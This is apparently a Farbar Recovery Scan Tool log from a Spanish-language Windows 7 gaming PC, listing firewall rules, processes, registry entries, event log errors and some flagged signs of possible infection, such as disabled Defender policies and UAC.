2017-11-02 16:13 - 2017-11-02 16:13 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2017-07-04 19:52 - 2017-11-29 02:09 - 000781088 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2017-07-04 19:52 - 2016-08-31 22:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2017-07-04 19:52 - 2016-08-31 22:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2017-07-04 19:52 - 2016-08-31 22:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2017-07-04 19:52 - 2017-12-15 16:59 - 002558752 _____ () C:\Program Files (x86)\Steam\video.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2017-07-04 19:52 - 2017-12-15 16:59 - 000904992 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-07-04 19:52 - 2016-07-04 19:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2017-07-04 19:53 - 2017-09-06 23:04 - 000678400 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-04 19:53 - 2017-10-31 01:44 - 071471904 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-07-04 19:52 - 2015-09-24 20:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-08 23:54 - 2018-01-08 17:52 - 001891832 _____ () C:\Users\Franco\AppData\Local\Discord\app-0.0.300\ffmpeg.dll
2018-01-08 23:55 - 2018-01-08 23:55 - 001780216 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_overlay2\discord_overlay2.node
2018-01-08 23:54 - 2018-01-08 17:52 - 001937912 _____ () C:\Users\Franco\AppData\Local\Discord\app-0.0.300\libglesv2.dll
2018-01-08 23:54 - 2018-01-08 17:52 - 000095736 _____ () C:\Users\Franco\AppData\Local\Discord\app-0.0.300\libegl.dll
2018-01-08 23:55 - 2018-01-08 23:55 - 009804280 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_voice\discord_voice.node
2018-01-08 23:55 - 2018-01-08 23:55 - 001505784 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_utils\discord_utils.node
2018-01-08 23:55 - 2018-01-08 23:55 - 000513016 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_erlpack\discord_erlpack.node
2018-01-08 23:55 - 2018-01-08 23:55 - 002662904 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_rpc\discord_rpc.node
2018-01-08 23:55 - 2018-01-08 23:55 - 001517048 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_game_utils\discord_game_utils.node
2018-01-08 23:55 - 2018-01-08 23:55 - 002749944 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_contact_import\discord_contact_import.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\Franco\AppData\Local\Mjc7tFDl:8ozO9lwap8D2aIzrlH [2270]
AlternateDataStreams: C:\Users\Franco\AppData\Local\Temp:ctdNU4MXUVOLiXUVWJ4jPCjB [2028]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 23:34 - 2009-06-10 18:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 200.42.4.199 - 200.49.130.51
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: SwitchBoard => 3
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Franco\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: DAEMON Tools Lite Automount => "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{B8623A1A-D59F-4239-8AF9-9D75A7D265EA}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe
FirewallRules: [TCP Query User{47EC3903-1218-4B2E-A5E0-3455F606BEF3}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{3E98CFA7-7183-45E9-AED8-76261037A05F}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [{80E78FBB-B887-46E1-AC75-4BEFABAC7983}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.607\SZBrowser.exe
FirewallRules: [{10169188-AA69-4F87-A13E-0E4D23A1C0A9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{DFB5F6F8-0C86-4439-8F28-069D164F83A8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{A17B3358-2D89-4B19-959E-38FAD29560D6}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A3DE7EDB-73A9-4244-8664-141E1F35C232}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{4BF06B6B-2D73-4CDF-8A20-3C371F945B48}C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{7DAE0878-D1BC-46B5-8988-0B0C27930B37}C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{A6C45444-FFBF-452A-AAB7-9A5C0C0F24AA}D:\terraria v1.3.5.3 rus\terrariaserver.exe] => (Allow) D:\terraria v1.3.5.3 rus\terrariaserver.exe
FirewallRules: [UDP Query User{F681EE89-1B3F-461C-88DF-2D5C30FD046B}D:\terraria v1.3.5.3 rus\terrariaserver.exe] => (Allow) D:\terraria v1.3.5.3 rus\terrariaserver.exe
FirewallRules: [{D8ED11CE-6501-4F22-9B64-82048ECCA422}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{FD40BA23-A665-4C8B-A738-F5C1B86248F7}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{077CAC7A-16E9-4267-8B22-960A3853E2B9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{A3847F28-9730-4F9B-B05D-5A66A1DAA00B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{0C202732-6D57-4A44-9143-27159B6DB8E9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{1F5942F0-A990-4202-930B-9C8635F760C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{9570BFEE-1749-4270-BA79-1DA5D662889B}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe
FirewallRules: [{97A29667-3619-4938-87CE-11C812C60E5F}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser.exe
FirewallRules: [{D014278F-E2D3-4C9C-AE8A-35E50308EA77}] => (Allow) C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe
FirewallRules: [{FEDD7AAE-0059-4061-B469-5EAE5027745D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [{46B33AB8-CF86-472A-BA2D-8DA5F60B31E6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [TCP Query User{394ABA4B-F95E-428D-9929-7ECF72E6F91E}C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe] => (Allow) C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe
FirewallRules: [UDP Query User{5528C790-C050-4E21-AF23-BC5F36829804}C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe] => (Allow) C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe
FirewallRules: [TCP Query User{B77BB40F-B0FB-4232-8530-E4E214F51C04}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{16832289-B99F-4E72-9DA8-B8389902E954}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [TCP Query User{65AAC54B-C5D7-44CE-B801-4AAC2D7FE3DC}C:\program files\java\jre1.8.0_151\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_151\bin\javaw.exe
FirewallRules: [UDP Query User{1612FE1B-3504-4B5D-A1C7-C10C934BED79}C:\program files\java\jre1.8.0_151\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_151\bin\javaw.exe
FirewallRules: [TCP Query User{C041F874-FDCA-4AB3-8E6C-F2A1C7DF6249}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{8475042F-814C-425B-A6A8-E3720EA94D40}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D26550C-6631-4120-8F07-275DB5DE8974}] => (Allow) LPort=49172
FirewallRules: [{7B0FFCAF-4F00-4545-9380-5B88C70ED124}] => (Allow) LPort=5000
FirewallRules: [TCP Query User{76480B70-EA79-498E-8580-6EFD90E7F33F}D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe] => (Allow) D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe
FirewallRules: [UDP Query User{249A2143-E989-4F5A-9164-82F3CE410B12}D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe] => (Allow) D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe
FirewallRules: [{5C958D52-6D10-4A32-8F6B-B0CB17EF8F4C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Battlerite\Battlerite.exe
FirewallRules: [{036285F0-7B39-4794-8806-D1E819B46240}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Battlerite\Battlerite.exe
FirewallRules: [TCP Query User{2F261C7D-7237-489B-AFB5-AF1A7DB2C6CC}C:\program files\killingfloor\system\killingfloor.exe] => (Allow) C:\program files\killingfloor\system\killingfloor.exe
FirewallRules: [UDP Query User{233B9B95-4A70-4B0E-8A37-3098C937D6C6}C:\program files\killingfloor\system\killingfloor.exe] => (Allow) C:\program files\killingfloor\system\killingfloor.exe
FirewallRules: [TCP Query User{B130D0DD-0E4E-4231-817B-EFF1695A2912}C:\program files\dungeon siege\dsloa.exe] => (Allow) C:\program files\dungeon siege\dsloa.exe
FirewallRules: [UDP Query User{527FA157-05BB-4420-9B93-9D4CC3832345}C:\program files\dungeon siege\dsloa.exe] => (Allow) C:\program files\dungeon siege\dsloa.exe
FirewallRules: [{FE4038FC-BB52-4C7E-9BB7-6D12EFDE3F7A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{1CBC02AB-F03B-43B7-ACC0-95A4875B8D64}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{CC6468EC-1B20-4B37-8800-5788658EDD06}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [UDP Query User{A6ED55D5-8CE4-4226-9D5C-32F5047AFDB6}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [TCP Query User{3F39910A-8052-4EC5-8E43-EB36443C95EE}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{62D0705A-D240-4115-8A95-D57B5980B271}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{97CF3E2A-7157-4139-852F-E5343397BE5E}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [UDP Query User{6866E3B2-589E-4A15-999B-C237E68051F0}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [{782BC035-EF86-4495-82CF-9677E64BAAF9}] => (Allow) D:\SteamLibrary\steamapps\common\BrainOut\bin\javaw.exe
FirewallRules: [{443D8DA7-F129-4FC6-90DC-184C1288FDF6}] => (Allow) D:\SteamLibrary\steamapps\common\BrainOut\bin\javaw.exe
FirewallRules: [TCP Query User{62862246-EE3B-496D-B62F-47562C4EA917}D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe] => (Allow) D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe
FirewallRules: [UDP Query User{CFA150ED-2B91-4FE9-B95E-FA5541D77543}D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe] => (Allow) D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe
FirewallRules: [{63ED1EDB-6AF0-4BEF-8847-E1F1C1179BC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{A2E1458D-D524-4C46-A481-D891F4E2535B}] => (Allow) D:\SteamLibrary\steamapps\common\VRChat\VRChat.exe
FirewallRules: [{F4DD66BA-C5B4-45C8-9E42-8CF64E7DA190}] => (Allow) D:\SteamLibrary\steamapps\common\VRChat\VRChat.exe
FirewallRules: [TCP Query User{D1EF1EB9-E677-417F-A40A-10596347AE65}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{A8CE466B-0791-4681-A348-1B30CDDD1770}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [{AB7FC2F2-6C25-480F-9DD4-EAF25304FA4D}] => (Allow) D:\SteamLibrary\steamapps\common\nmrih\sdk\hl2.exe
FirewallRules: [{88E6C9A4-C8EC-4B57-97BA-DD2A68760ED0}] => (Allow) D:\SteamLibrary\steamapps\common\nmrih\sdk\hl2.exe
 
==================== Restore Points =========================
 
07-01-2018 21:23:20 Installed LogMeIn Hamachi
07-01-2018 21:34:42 Installed Java 7 Update 51
12-01-2018 02:06:59 Installed Gtk# for .Net 2.12.26
15-01-2018 19:59:16 Removed OEM Application Profile
15-01-2018 20:02:09 Removed Gtk# for .Net 2.12.26
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/15/2018 07:54:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/15/2018 07:53:48 PM) (Source: amdacpusrsvc) (EventID: 0) (User: )
Description: Event-ID 0
 
Error: (01/15/2018 02:12:46 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: mmc.exe, versión: 6.1.7600.16385, marca de tiempo: 0x4a5bc808
Nombre del módulo con errores: mmc.exe, versión: 6.1.7600.16385, marca de tiempo: 0x4a5bc808
Código de excepción: 0xc0000094
Desplazamiento de errores: 0x0000000000034f82
Id. del proceso con errores: 0x%9
Hora de inicio de la aplicación con errores: 0xmmc.exe0
Ruta de acceso de la aplicación con errores: mmc.exe1
Ruta de acceso del módulo con errores: mmc.exe2
Id. del informe: mmc.exe3
 
Error: (01/14/2018 10:39:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/14/2018 10:38:44 PM) (Source: amdacpusrsvc) (EventID: 0) (User: )
Description: Event-ID 0
 
Error: (01/14/2018 08:36:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: 594615014.exe, versión: 0.0.0.0, marca de tiempo: 0x2a425e19
Nombre del módulo con errores: unknown, versión: 0.0.0.0, marca de tiempo: 0x00000000
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000e610
Id. del proceso con errores: 0x17e8
Hora de inicio de la aplicación con errores: 0x01d38d9087a804f8
Ruta de acceso de la aplicación con errores: C:\Users\Franco\AppData\Local\Temp\594615014.exe
Ruta de acceso del módulo con errores: unknown
Id. del informe: cac203e9-f983-11e7-91d4-d0509965a841
 
Error: (01/14/2018 02:46:25 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/14/2018 02:45:20 PM) (Source: amdacpusrsvc) (EventID: 0) (User: )
Description: Event-ID 0
 
Error: (01/14/2018 02:34:38 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/14/2018 02:34:19 PM) (Source: ATIeRecord) (EventID: 16387) (User: )
Description: ATI EEU Service event error
 
 
System errors:
=============
Error: (01/15/2018 07:53:57 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: El siguiente controlador de inicio del sistema o de inicio del arranque no se cargó correctamente: 
cdrom
 
Error: (01/15/2018 07:53:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Solvusoft Suite Service no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.
 
Error: (01/15/2018 07:53:50 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Se agotó el tiempo de espera (30000 ms) para la conexión con el servicio Solvusoft Suite Service.
 
Error: (01/15/2018 07:53:25 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: El cierre anterior del sistema a las 08:40:27 a.m. del ‎15/‎01/‎2018 resultó inesperado.
 
Error: (01/14/2018 10:38:48 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: El siguiente controlador de inicio del sistema o de inicio del arranque no se cargó correctamente: 
cdrom
 
Error: (01/14/2018 10:38:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Solvusoft Suite Service no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.
 
Error: (01/14/2018 10:38:44 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Se agotó el tiempo de espera (30000 ms) para la conexión con el servicio Solvusoft Suite Service.
 
Error: (01/14/2018 10:38:38 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: El equipo se reinició después de una comprobación de errores. La comprobación de errores fue: 0x000000ea (0xfffffa8004688940, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). Se guardó un volcado en: C:\Windows\MEMORY.DMP. Id. de informe: 011418-16239-01.
 
Error: (01/14/2018 10:38:38 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: El cierre anterior del sistema a las 10:36:35 p.m. del ‎14/‎01/‎2018 resultó inesperado.
 
Error: (01/14/2018 02:45:23 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: El siguiente controlador de inicio del sistema o de inicio del arranque no se cargó correctamente: 
cdrom
 
 
CodeIntegrity:
===================================
  Date: 2017-05-23 19:25:16.578
  Description: Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Users\Franco\AppData\Local\Temp\Rar$EXa0.786\kerneld.x64 porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.
 
  Date: 2017-05-23 19:25:16.547
  Description: Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Users\Franco\AppData\Local\Temp\Rar$EXa0.786\kerneld.x64 porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.
 
 
==================== Memory info =========================== 
 
Processor: AMD A10-7850K Radeon R7, 12 Compute Cores 4C+8G
Percentage of memory in use: 71%
Total physical RAM: 3521.23 MB
Available physical RAM: 1012.19 MB
Total Virtual: 7040.64 MB
Available Virtual: 4239.25 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:833.85 GB) (Free:678.19 GB) NTFS
Drive d: () (Fixed) (Total:97.56 GB) (Free:16.08 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 000E78F2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=833.9 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

Ran by Franco (administrator) on POROTA (15-01-2018 20:04:22)
Running from C:\Users\Franco\Downloads
Loaded Profiles: Franco (Available Profiles: Franco)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Español (España, internacional)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices) C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe
(H.D.S. Hungary) D:\Hard Disk Sentinel\HDSentinel.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Advanced Micro Devices, Inc.) C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Discord Inc.) C:\Users\Franco\AppData\Local\Discord\app-0.0.300\Discord.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Discord Inc.) C:\Users\Franco\AppData\Local\Discord\app-0.0.300\Discord.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Discord Inc.) C:\Users\Franco\AppData\Local\Discord\app-0.0.300\Discord.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [246120 2018-01-07] (AVAST Software)
HKLM\...\Run: [NUSB3MON] => C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe [97280 2012-04-11] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18290688 2017-03-29] (Realtek Semiconductor)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3111712 2017-12-15] (Valve Corporation)
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [10024624 2017-11-08] (Piriform Ltd)
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\MountPoints2: {cdcb5ac8-5cfb-11e7-9ef6-d0509965a841} - F:\setup.exe
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\VIDEOWLP.SCR
Startup: C:\Users\Franco\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Animated Wallpaper.lnk [2017-11-19]
ShortcutTarget: Animated Wallpaper.lnk -> C:\Program Files\Animated Wallpaper\Video Wallpaper\Launch Wallpaper.exe (No File)
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
